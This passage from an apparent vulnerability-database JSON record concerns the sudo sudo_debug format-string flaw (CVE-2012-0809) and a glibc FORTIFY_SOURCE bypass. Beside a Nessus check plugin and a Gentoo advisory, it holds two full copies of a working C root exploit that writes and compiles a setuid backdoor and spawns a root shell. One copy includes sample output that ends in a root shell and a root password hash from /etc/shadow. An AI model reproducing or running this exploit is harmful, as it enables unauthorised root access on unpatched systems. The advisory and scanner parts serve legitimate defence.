prompt for a password when changing to the new group (CVE-2011-0010).\n A format string vulnerability exists in the 'sudo_debug()' function\n (CVE-2012-0809).\n \nImpact :\n\n A local attacker could possibly gain the ability to run arbitrary\n commands with the privileges of other users or groups, including root.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All sudo users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask 
--oneshot --verbose '>=app-admin/sudo-1.8.3_p2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/sudo\", unaffected:make_list(\"ge 1.8.3_p2\", \"rge 1.7.4_p5\"), vulnerable:make_list(\"lt 1.8.3_p2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"sudo\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-15T19:11:18", "description": "sudo versions 1.8.0 through 1.8.3p1 sudo_debug root exploit with glibc FORTIFY_SOURCE bypass.", "edition": 2, "published": "2013-05-01T00:00:00", "type": "zdt", "title": "Sudo v1.8.0-1.8.3p1 (sudo_debug) - Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "1337DAY-ID-20717", "href": "https://0day.today/exploit/description/20717", "sourceData": "#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n \r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n \r\n/* files that we create on disk */\r\n#define BACKDOOR \"e.c\"\r\n#define BD_COMPILED \"e\"\r\n#define SUDO_ASKPASS \"e.sh\"\r\n \r\nextern char **environ;\r\nstruct utsname ver;\r\n \r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n \r\n/* hardcoded path to sudo */\r\nconst char sudo[] = \"/usr/bin/sudo\\0\";\r\nchar s_version[20];\r\n \r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {\"1.8.0\"},\r\n {\"1.8.1\"},\r\n {\"1.8.2\"},\r\n {\"1.8.3\"}\r\n};\r\n \r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {\"2.14.90\"},\r\n};\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf(\"[+] Targeting release: %s\\n\", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf(\"[+] Press enter when ready...\");\r\n scanf(\"%c\", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n \r\n // ulimited stack\r\n 
rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n \r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf(\"[-] An error occurred while forking sudo\\n\");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n \r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\r\n fp = popen(sudo_ver_cmd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\r\n \"#include <stdlib.h>\\r\\n\"\r\n \"int main(int argc, char **argv){\\r\\n\"\r\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\r\n \" setresuid(0,0,0);\\r\\n\"\r\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\r\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\r\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\r\n \" system(\\\"/bin/sh\\\");\\r\\n\"\r\n \" exit(0);\\r\\n\"\r\n \"}\\r\\n\";\r\n \r\n FILE *fp = fopen(BACKDOOR,\"wb\");\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" 
);\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\r\n }\r\n \r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\r\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\r\n fp = popen(compile_bd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\r\n returnval = -1;\r\n }\r\n \r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,\"w\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\r\n }\r\n \r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n \r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n \r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\r\n \r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n \r\nvoid *kill_sudo(){\r\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\r\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\r\n \r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n \r\nvoid *pop_shell(){\r\n // set our 
environment\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"SUDO_ASKPASS\");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20717"}], "gentoo": [{"lastseen": "2016-09-06T19:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809", "CVE-2011-0010"], "edition": 1, "description": "### Background\n\nsudo allows a system administrator to give users the ability to run commands as other users. \n\n### Description\n\nTwo vulnerabilities have been discovered in sudo:\n\n * When the sudoers file is configured with a Runas group, sudo does not prompt for a password when changing to the new group (CVE-2011-0010). \n * A format string vulnerability exists in the \"sudo_debug()\" function (CVE-2012-0809). \n\n### Impact\n\nA local attacker could possibly gain the ability to run arbitrary commands with the privileges of other users or groups, including root. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll sudo users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/sudo-1.8.3_p2\"", "modified": "2012-03-06T00:00:00", "published": "2012-03-06T00:00:00", "id": "GLSA-201203-06", "href": "https://security.gentoo.org/glsa/201203-06", "type": "gentoo", "title": "sudo: Privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:43:33", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0809", "CVE-2012-0864"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78801", "id": "SSV:78801", "sourceData": "\n /*\r\n death-star.c\r\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\r\n by aeon - http://infosecabsurdity.wordpress.com/\r\n\r\n This PoC exploits:\r\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow\r\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 "sudo_debug" format string\r\n \r\n Tested on:\r\n - Fedora core 16 verne\r\n - glibc 2.14.90.14 release\r\n - sudo 1.8.1p2\r\n \r\n Notes:\r\n - This exploit actually turned out very reliable :-) \r\n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\r\n or a libc function pointer so you dont write to disk. 
I wont be releasing that version :-)\r\n\r\n References and thanks too:\r\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\r\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\r\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\r\n - "A Eulogy for Format Strings" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\r\n\r\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\r\n[aeon@localhost tmp]$ ./death-star \r\n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\r\n[+] Found vuln glibc version: 2.14.90\r\n[+] Found a vuln sudo version: 1.8.1\r\n[+] Writing backdoor: e.c\r\n[+] Compiling backdoor: e\r\n[+] Writing SUDO_ASKPASS file: e.sh\r\n[+] Press enter when ready...\r\n\r\n< -------------- REMOVED -------------->\r\n\r\n A?AF@F@F@F@F@' from LD_PRELOAD cannot be preloaded: ignored.\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: sudo_mode 1081383169\r\nSorry, try again.\r\nSorry, try again.\r\nSorry, try again.\r\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\r\n %1073886251%21372736 %: policy plugin returns 1081402445\r\n[+] Getting root..!\r\n[+] Cleaning system.\r\n[+] Launching root shell!\r\nsh-4.2# id; uname -a\r\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\r\nsh-4.2# head -n1 /etc/shadow\r\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\r\nsh-4.2#\r\n*/\r\n\r\n#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n\r\n#define 
OFFSET 65000\r\n#define NUM_THREADS 0\r\n\r\n/* files that we create on disk */\r\n#define BACKDOOR "e.c"\r\n#define BD_COMPILED "e"\r\n#define SUDO_ASKPASS "e.sh"\r\n\r\nextern char **environ;\r\nstruct utsname ver;\r\n\r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n\r\n/* hardcoded path to sudo */\r\nconst char sudo[] = "/usr/bin/sudo\\0";\r\nchar s_version[20];\r\n\r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {"1.8.0"},\r\n {"1.8.1"},\r\n {"1.8.2"},\r\n {"1.8.3"}\r\n};\r\n\r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {"2.14.90"},\r\n};\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf("[+] Targeting release: %s\\n", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf("[+] Press enter when ready...");\r\n scanf("%c", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n\r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n\r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf("[-] An error occurred while forking sudo\\n");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n\r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf("[+] Found vuln glibc version: %s\\n", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo);\r\n fp = popen(sudo_ver_cmd, "r");\r\n\r\n if (fp == NULL) 
{\r\n printf("[-] Failed to get sudo's version\\n[-]Exiting.." );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf("[+] Found a vuln sudo version: %s\\n", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = "#include <stdio.h>\\r\\n"\r\n "#include <stdlib.h>\\r\\n"\r\n "int main(int argc, char **argv){\\r\\n"\r\n " printf(\\"[+] Getting root..!\\\\n\\");\\r\\n"\r\n " setresuid(0,0,0);\\r\\n"\r\n " printf(\\"[+] Cleaning system.\\\\n\\");\\r\\n"\r\n " remove(\\"e\\"); remove(\\"e.c\\"); remove(\\"e.sh\\");\\r\\n"\r\n " printf(\\"[+] Launching root shell!\\\\n\\");\\r\\n"\r\n " system(\\"/bin/sh\\");\\r\\n"\r\n " exit(0);\\r\\n"\r\n "}\\r\\n";\r\n\r\n FILE *fp = fopen(BACKDOOR,"wb");\r\n if (fp == NULL) {\r\n printf("[-] Failed to write backdoor on the target, check your permissions\\n" );\r\n returnval = -1;\r\n }else{\r\n printf("[+] Writing backdoor: %s\\n", BACKDOOR);\r\n }\r\n\r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED);\r\n printf("[+] Compiling backdoor: %s\\n", BD_COMPILED);\r\n fp = popen(compile_bd, "r");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to compile the backdoor, check the gcc path\\n" );\r\n returnval = -1;\r\n }\r\n\r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,"w");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to write backdoor on the target, check your permissions\\n" );\r\n returnval = -1;\r\n }else{\r\n printf("[+] Writing SUDO_ASKPASS file: 
%s\\n", SUDO_ASKPASS);\r\n }\r\n\r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n\r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = "LD_PRELOAD=";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n\r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS);\r\n\r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n\r\nvoid *kill_sudo(){\r\n char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$";\r\n char *args[] = { fmtstring, "-D9", "-A", "", NULL};\r\n\r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n\r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv("LD_PRELOAD");\r\n unsetenv("SUDO_ASKPASS");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78801"}]}